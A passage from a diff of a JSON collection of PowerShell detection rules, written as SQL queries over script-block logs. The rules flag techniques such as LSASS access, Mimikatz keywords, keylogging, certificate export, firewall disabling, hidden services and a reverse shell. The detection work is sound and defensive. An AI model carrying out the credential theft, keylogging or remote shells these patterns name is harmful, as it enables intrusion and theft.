"Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Suspicious Get Local Groups Information - PowerShell", + "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "status": "experimental", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_local_group_reco.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": 
"Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "title": "Suspicious PowerShell Get Current User", + "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "description": "Detects the use of PowerShell to identify the current logged user.", + "author": "frack113", + "tags": [ + "attack.discovery", + "attack.t1033" + 
], + "falsepositives": [ + "Legitimate PowerShell scripts" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + ], + "filename": "posh_ps_susp_get_current_user.yml" + }, + { + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Suspicious Connection to Remote Account", - "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "status": "test", - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of 
the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_networkcredential.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "status": "test", 
- "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1546.013" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", + 
"status": "test", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "App-V clients" + 
"Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "status": "test", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE 
'%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Data Compressed - PowerShell", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "test", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.exfiltration", + "attack.t1560" ], "falsepositives": [ - "Unknown" + "Highly likely if archive operations are done via PowerShell." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_data_compressed.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" 
@@ -7597,46 +7160,47 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "title": "Enable Windows Remote Management", + 
"id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery" + 
"attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate administration scripts" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { "title": "Powershell MsXml COM Object", 
@@ -7658,325 +7222,390 @@ "filename": "posh_ps_msxml_com.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR 
ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE 
'\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." 
